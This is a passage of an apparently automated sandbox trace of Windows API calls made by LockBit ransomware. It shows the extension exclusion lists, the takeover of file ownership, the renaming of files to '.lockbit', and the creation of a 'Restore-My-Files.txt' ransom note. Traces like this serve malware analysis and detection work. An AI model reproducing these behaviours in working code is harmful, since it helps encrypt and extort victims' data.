1 [0095.325] lstrcmpiW (lpString1=".nls", lpString2=".dat") returned 1 [0095.325] lstrcmpiW (lpString1=".diagcab", lpString2=".dat") returned 1 [0095.325] lstrcmpiW (lpString1=".lock", lpString2=".dat") returned 1 [0095.325] lstrcmpiW (lpString1=".ocx", lpString2=".dat") returned 1 [0095.325] lstrcmpiW (lpString1=".mpa", lpString2=".dat") returned 1 [0095.325] lstrcmpiW (lpString1=".cpl", lpString2=".dat") returned -1 [0095.325] lstrcmpiW (lpString1=".mod", lpString2=".dat") returned 1 [0095.325] lstrcmpiW (lpString1=".hta", lpString2=".dat") returned 1 [0095.325] lstrcmpiW (lpString1=".icns", lpString2=".dat") returned 1 [0095.325] lstrcmpiW (lpString1=".prf", lpString2=".dat") returned 1 [0095.325] lstrcmpiW (lpString1=".rtp", lpString2=".dat") returned 1 [0095.325] lstrcmpiW (lpString1=".diagcfg", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".msstyles", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".bin", lpString2=".dat") returned -1 [0095.326] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".shs", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".drv", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".wpx", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".bat", lpString2=".dat") returned -1 [0095.326] lstrcmpiW (lpString1=".rom", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".msc", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".spl", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".ps1", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".msu", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".ics", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".key", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".mp3", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".reg", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".dll", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".ini", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".idx", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".sys", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".ico", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".lnk", lpString2=".dat") returned 1 [0095.326] lstrcmpiW (lpString1=".rdp", lpString2=".dat") returned 1 [0095.327] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0095.327] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="hwrusalm.dat") returned 1 [0095.327] lstrcmpiW (lpString1="ntldr", lpString2="hwrusalm.dat") returned 1 [0095.327] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="hwrusalm.dat") returned 1 [0095.327] lstrcmpiW (lpString1="bootsect.bak", lpString2="hwrusalm.dat") returned -1 [0095.327] lstrcmpiW (lpString1="autorun.inf", lpString2="hwrusalm.dat") returned -1 [0095.327] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0095.327] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat") returned=".dat" [0095.327] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0095.327] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0095.327] lstrcmpiW (lpString1=".7z", lpString2=".dat") returned -1 [0095.327] lstrcmpiW (lpString1=".ckp", lpString2=".dat") returned -1 [0095.327] lstrcmpiW (lpString1=".dacpac", lpString2=".dat") returned -1 [0095.327] lstrcmpiW (lpString1=".db", lpString2=".dat") returned 1 [0095.327] lstrcmpiW (lpString1=".db-shm", lpString2=".dat") returned 1 [0095.327] lstrcmpiW (lpString1=".db-wal", lpString2=".dat") returned 1 [0095.327] lstrcmpiW (lpString1=".db3", lpString2=".dat") returned 1 [0095.327] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0095.327] lstrcmpiW (lpString1=".dbc", lpString2=".dat") returned 1 [0095.327] lstrcmpiW (lpString1=".dbs", lpString2=".dat") returned 1 [0095.327] lstrcmpiW (lpString1=".dbt", lpString2=".dat") returned 1 [0095.327] lstrcmpiW (lpString1=".dbv", lpString2=".dat") returned 1 [0095.327] lstrcmpiW (lpString1=".frm", lpString2=".dat") returned 1 [0095.327] lstrcmpiW (lpString1=".mdf", lpString2=".dat") returned 1 [0095.327] lstrcmpiW (lpString1=".mrg", lpString2=".dat") returned 1 [0095.328] lstrcmpiW (lpString1=".mwb", lpString2=".dat") returned 1 [0095.328] lstrcmpiW (lpString1=".myd", lpString2=".dat") returned 1 [0095.328] lstrcmpiW (lpString1=".ndf", lpString2=".dat") returned 1 [0095.328] lstrcmpiW (lpString1=".qry", lpString2=".dat") returned 1 [0095.328] lstrcmpiW (lpString1=".sdb", lpString2=".dat") returned 1 [0095.328] lstrcmpiW (lpString1=".sdf", lpString2=".dat") returned 1 [0095.328] lstrcmpiW (lpString1=".sql", lpString2=".dat") returned 1 [0095.328] lstrcmpiW (lpString1=".sqlite", lpString2=".dat") returned 1 [0095.328] lstrcmpiW (lpString1=".sqlite3", lpString2=".dat") returned 1 [0095.328] lstrcmpiW (lpString1=".sqlitedb", lpString2=".dat") returned 1 [0095.328] lstrcmpiW (lpString1=".tmd", lpString2=".dat") returned 1 [0095.328] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.lockbit") returned 72 [0095.328] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0095.328] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.lockbit")) returned 0 [0095.328] GetLastError () returned 0x5 [0095.329] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0095.329] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0095.329] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0095.329] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0095.329] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0095.329] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3d0, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0095.330] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0095.330] NtQueryInformationFile (in: FileHandle=0x3d0, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0095.340] NtClose (Handle=0x3d0) returned 0x0 [0095.340] RtlFreeAnsiString (AnsiString="\\") [0095.340] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3d0) returned 1 [0095.340] malloc (_Size=0x200) returned 0x53fcc0 [0095.340] GetTokenInformation (in: TokenHandle=0x3d0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x53fcc0, ReturnLength=0x344cda0) returned 1 [0095.340] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0095.340] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0095.341] CloseHandle (hObject=0x3d0) returned 1 [0095.341] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0095.341] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0095.341] free (_Block=0x53fcc0) [0095.341] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0095.341] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.lockbit")) returned 1 [0095.342] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3d0 [0095.342] CreateIoCompletionPort (FileHandle=0x3d0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0095.342] malloc (_Size=0x40068) returned 0x3940048 [0095.342] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=3195696) returned 1 [0095.342] ReadFile (in: hFile=0x3d0, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 0x0 [0095.345] GetLastError () returned 0x3e5 [0095.345] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0095.345] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0095.345] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.345] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dbfb43d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3dbfb43d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3da7e69b, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x3ee0d0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="hwrusash.dat", cAlternateFileName="")) returned 1 [0095.345] lstrcmpiW (lpString1=".", lpString2="hwrusash.dat") returned -1 [0095.345] lstrcmpiW (lpString1="..", lpString2="hwrusash.dat") returned -1 [0095.345] PathFindExtensionW (pszPath="hwrusash.dat") returned=".dat" [0095.345] lstrcmpiW (lpString1=".386", lpString2=".dat") returned -1 [0095.345] lstrcmpiW (lpString1=".cmd", lpString2=".dat") returned -1 [0095.345] lstrcmpiW (lpString1=".exe", lpString2=".dat") returned 1 [0095.345] lstrcmpiW (lpString1=".ani", lpString2=".dat") returned -1 [0095.345] lstrcmpiW (lpString1=".adv", lpString2=".dat") returned -1 [0095.345] lstrcmpiW (lpString1=".theme", lpString2=".dat") returned 1 [0095.345] lstrcmpiW (lpString1=".msi", lpString2=".dat") returned 1 [0095.345] lstrcmpiW (lpString1=".msp", lpString2=".dat") returned 1 [0095.345] lstrcmpiW (lpString1=".com", lpString2=".dat") returned -1 [0095.345] lstrcmpiW (lpString1=".diagpkg", lpString2=".dat") returned 1 [0095.346] lstrcmpiW (lpString1=".nls", lpString2=".dat") returned 1 [0095.346] lstrcmpiW (lpString1=".diagcab", lpString2=".dat") returned 1 [0095.346] lstrcmpiW (lpString1=".lock", lpString2=".dat") returned 1 [0095.346] lstrcmpiW (lpString1=".ocx", lpString2=".dat") returned 1 [0095.346] lstrcmpiW (lpString1=".mpa", lpString2=".dat") returned 1 [0095.346] lstrcmpiW (lpString1=".cpl", lpString2=".dat") returned -1 [0095.346] lstrcmpiW (lpString1=".mod", lpString2=".dat") returned 1 [0095.346] lstrcmpiW (lpString1=".hta", lpString2=".dat") returned 1 [0095.346] lstrcmpiW (lpString1=".icns", lpString2=".dat") returned 1 [0095.346] lstrcmpiW (lpString1=".prf", lpString2=".dat") returned 1 [0095.346] lstrcmpiW (lpString1=".rtp", lpString2=".dat") returned 1 [0095.346] lstrcmpiW (lpString1=".diagcfg", lpString2=".dat") returned 1 [0095.346] lstrcmpiW (lpString1=".msstyles", lpString2=".dat") returned 1 [0095.346] lstrcmpiW (lpString1=".bin", lpString2=".dat") returned -1 [0095.346] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0095.346] lstrcmpiW (lpString1=".shs", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".drv", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".wpx", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".bat", lpString2=".dat") returned -1 [0095.347] lstrcmpiW (lpString1=".rom", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".msc", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".spl", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".ps1", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".msu", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".ics", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".key", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".mp3", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".reg", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".dll", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".ini", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".idx", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".sys", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".ico", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".lnk", lpString2=".dat") returned 1 [0095.347] lstrcmpiW (lpString1=".rdp", lpString2=".dat") returned 1 [0095.347] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0095.347] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="hwrusash.dat") returned 1 [0095.347] lstrcmpiW (lpString1="ntldr", lpString2="hwrusash.dat") returned 1 [0095.347] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="hwrusash.dat") returned 1 [0095.347] lstrcmpiW (lpString1="bootsect.bak", lpString2="hwrusash.dat") returned -1 [0095.347] lstrcmpiW (lpString1="autorun.inf", lpString2="hwrusash.dat") returned -1 [0095.347] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0095.347] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat") returned=".dat" [0095.347] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".7z", lpString2=".dat") returned -1 [0095.348] lstrcmpiW (lpString1=".ckp", lpString2=".dat") returned -1 [0095.348] lstrcmpiW (lpString1=".dacpac", lpString2=".dat") returned -1 [0095.348] lstrcmpiW (lpString1=".db", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".db-shm", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".db-wal", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".db3", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".dbc", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".dbs", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".dbt", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".dbv", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".frm", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".mdf", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".mrg", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".mwb", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".myd", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".ndf", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".qry", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".sdb", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".sdf", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".sql", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".sqlite", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".sqlite3", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".sqlitedb", lpString2=".dat") returned 1 [0095.348] lstrcmpiW (lpString1=".tmd", lpString2=".dat") returned 1 [0095.348] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.lockbit") returned 72 [0095.348] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0095.349] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.lockbit")) returned 0 [0095.349] GetLastError () returned 0x5 [0095.349] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0095.349] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0095.349] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0095.349] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0095.350] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0095.350] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3d4, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0095.350] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0095.350] NtQueryInformationFile (in: FileHandle=0x3d4, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0095.756] NtClose (Handle=0x3d4) returned 0x0 [0095.756] RtlFreeAnsiString (AnsiString="\\") [0095.756] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3d4) returned 1 [0095.757] malloc (_Size=0x200) returned 0x53fcc0 [0095.757] GetTokenInformation (in: TokenHandle=0x3d4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x53fcc0, ReturnLength=0x344cda0) returned 1 [0095.757] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0095.757] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0095.757] CloseHandle (hObject=0x3d4) returned 1 [0095.757] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0095.758] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0095.758] free (_Block=0x53fcc0) [0095.758] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0095.758] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.lockbit")) returned 1 [0095.759] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3d4 [0095.759] CreateIoCompletionPort (FileHandle=0x3d4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0095.759] malloc (_Size=0x40068) returned 0x3940048 [0095.759] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=4120784) returned 1 [0095.759] ReadFile (in: hFile=0x3d4, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0095.761] GetLastError () returned 0x3e5 [0095.761] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0095.761] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0095.761] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.762] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c4bfb78, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x4c4bfb78, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x298e8420, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x56400, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="InkDiv.dll", cAlternateFileName="")) returned 1 [0095.762] lstrcmpiW (lpString1=".", lpString2="InkDiv.dll") returned -1 [0095.762] lstrcmpiW (lpString1="..", lpString2="InkDiv.dll") returned -1 [0095.762] PathFindExtensionW (pszPath="InkDiv.dll") returned=".dll" [0095.762] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0095.762] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0095.762] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0095.762] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0095.762] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0095.762] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0095.762] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0095.762] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0095.762] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0095.762] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0095.762] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0095.762] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0095.763] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0095.763] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0095.763] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0095.763] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0095.763] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0095.763] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0095.764] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0095.764] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0095.764] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0095.764] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0095.764] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0095.764] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0095.764] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0095.764] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: 